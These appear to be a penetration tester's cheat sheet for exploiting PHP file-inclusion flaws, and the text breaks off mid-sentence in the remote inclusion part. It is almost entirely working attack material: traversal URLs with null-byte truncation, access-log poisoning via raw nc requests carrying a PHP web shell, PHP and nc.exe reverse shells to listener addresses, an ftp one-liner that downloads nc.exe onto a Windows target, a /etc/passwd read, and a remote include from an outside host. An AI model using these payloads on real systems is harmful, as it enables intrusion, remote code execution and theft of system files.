Local File Inclusion
====================
The %00 (URL-encoded null byte) makes PHP versions before 5.3.4 stop reading the path at that point, so whatever the script appends after your input (e.g. a `.php` suffix) is ignored. It does nothing on PHP 5.3.4 or later, and if magic_quotes_gpc is enabled the byte is escaped before it reaches include(), which also breaks the trick.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00   (the script appears to build a file path from LANG, so keep the original value `en` in front of the traversal; use as many `../` as needed to reach the drive root, extra ones are harmless.)
...then poison the access log: open a raw TCP connection to the web server and send the PHP code as the request line. Apache writes the request into access.log as-is, so the code is there for the LFI to include (the log must be readable by the web-server user and you must know its path). Send it raw, not from a browser, or the `<` and `>` get URL-encoded and never execute; and keep it to one request, since everything you send afterwards is logged too.
~# nc 192.168.1.1 80      (then type the line below, press Enter twice and close the connection)
<?php print shell_exec($_GET['cmd']); ?>
...and use it: include the log through the same LFI and pass the command in the `cmd` parameter of that same request (the log path depends on the install; the XAMPP default is shown below).
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or, on Linux, a PHP reverse shell (start a listener first, e.g. `nc -lvp 1234` on 10.0.0.1):
<?php /* reverse shell: opens a TCP connection to 10.0.0.1:1234 and points sh's stdin/stdout/stderr at fd 3, which is where the new socket normally lands (first free descriptor after 0/1/2) -- fragile if other descriptors are open; URL-encode the <, > and & characters if this is passed in a query string */ $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally deliver the payload the same way (raw request via nc so it lands in the log, then trigger it through the LFI) and interact with the shell on your listener:
# Windows: fetch nc.exe from your FTP server with the built-in ftp client (script mode via -s:, so no interactive console is needed)
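REM Builds an ftp script (login haxy/haxy, binary mode, download nc.exe, quit) and runs it non-interactively with the built-in client.
REM No space before >> on the later lines: cmd's echo writes everything up to the redirection, so "echo haxy >> ftp.txt" stores "haxy " (trailing space) as the password.
REM The first line keeps its space on purpose: "21>ftp.txt" would be parsed as the handle redirection "1>" and write "open 192.168.1.1 2".
echo open 192.168.1.1 21 > ftp.txt && echo haxy>>ftp.txt && echo haxy>>ftp.txt && echo bin>>ftp.txt && echo GET nc.exe>>ftp.txt && echo bye>>ftp.txt && ftp -s:ftp.txt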
REM Reverse shell: connect back to a listener on port 31337 and hand it cmd.exe. Replace the IP with your own listener (192.168.1.1 is the target elsewhere in these notes).
nc.exe -e cmd.exe 192.168.1.1 31337
- - - - - - - -
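<?php /* Same nc.exe fetch as the cmd one-liner above, issued through the web shell one system() call per line.
         Uses <?php rather than the short tag <?, which is frequently disabled (short_open_tag=Off) and then prints the payload instead of running it.
         No space before >> on the later echo lines, otherwise cmd writes a trailing space into the ftp script (e.g. "haxor " as the password);
         the open line keeps its space because "21>ftp.txt" would be parsed as the handle redirection "1>". */ ?>
<?php system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<?php system('echo haxor>>ftp.txt'); ?>
<?php system('echo haxor>>ftp.txt'); ?>
<?php system('echo bin>>ftp.txt'); ?>
<?php system('echo GET nc.exe>>ftp.txt'); ?>
<?php system('echo bye>>ftp.txt'); ?>
<?php system('ftp -s:ftp.txt'); ?>
<?php /* reverse shell back to the listener; replace the IP/port with your own */ system('nc.exe -e cmd.exe 192.168.1.1 31337'); ?>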
<?php phpinfo(); ?>
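<?php /* <?php instead of the short tag <?, which is often disabled (short_open_tag=Off) and would leak the payload as plain text instead of running it */ system("cat /etc/passwd"); ?>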
<?php echo(shell_exec($_GET["cmd"])); ?>
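<?php /* the original `include="124.1.1.1"` is a parse error (include takes an expression, not an assignment); presumably meant as a remote include, which also needs allow_url_include=On (Off by default since PHP 5.2) */ include('http://124.1.1.1/'); ?>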
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00   (remote includes only work with allow_url_include=On, which has been Off by default since PHP 5.2; serve the payload with a .txt extension so your own server returns the source instead of executing it. The %00 strips any suffix the script appends and is subject to the same PHP < 5.3.4 limit as above.)
Note: the login.txt contains